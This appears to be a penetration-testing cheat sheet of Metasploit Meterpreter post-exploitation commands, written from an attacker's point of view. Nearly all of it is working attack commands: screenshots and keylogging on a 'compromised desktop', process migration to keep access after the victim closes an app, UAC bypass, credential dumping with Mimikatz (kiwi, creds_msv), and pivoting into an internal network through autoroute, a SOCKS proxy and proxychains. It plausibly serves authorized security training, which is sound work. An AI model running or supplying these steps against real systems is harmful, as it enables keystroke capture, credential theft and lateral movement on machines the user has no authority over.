Post Exploitation

Core Features

Take a screenshot of the compromised desktop:

meterpreter > screenshot

Start a keylogger:

meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Migrating Processes

When we compromise a host, our Meterpreter payload is executed inside the process of the application we attack. If the victim closes that process, our access to the machine is closed as well.

Using migrate command, we can move the execution of our Meterpreter to different processes. To do this, we first run ps to view all running processes and then pick one, like explorer.exe, and issue the migrate command:

meterpreter > ps
meterpreter > migrate <explorer.exe_id>

Or, we can set an autorun script before running the module:

msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate

Modules

Bypass UAC:

msf6 > use exploit/windows/local/bypassuac_injection_winsxs

PowerShell:

meterpreter > load powershell
meterpreter > powershell_execute "$PSVersionTable.PSVersion"

Mimikatz:

meterpreter > load kiwi
meterpreter > getsystem
meterpreter > creds_msv

Pivoting

Enumerate network interfaces:

C:\Windows\system32>ipconfig

Found two nework interfaces:

ipconfig

We are on 192.168.214.10 and we want to pivot to 172.16.214.10. Use autoroute:

msf6 > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
msf6 post(multi/manage/autoroute) > run

Use auxiliary/server/socks_proxy to configure a SOCKS proxy:

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 4a

Configure proxychains at /etc/proxychains4.conf:

/etc/proxychains4.conf

Now we can run commands with proxychains as prefix to pivot. For example:

proxychains rdesktop 172.16.214.5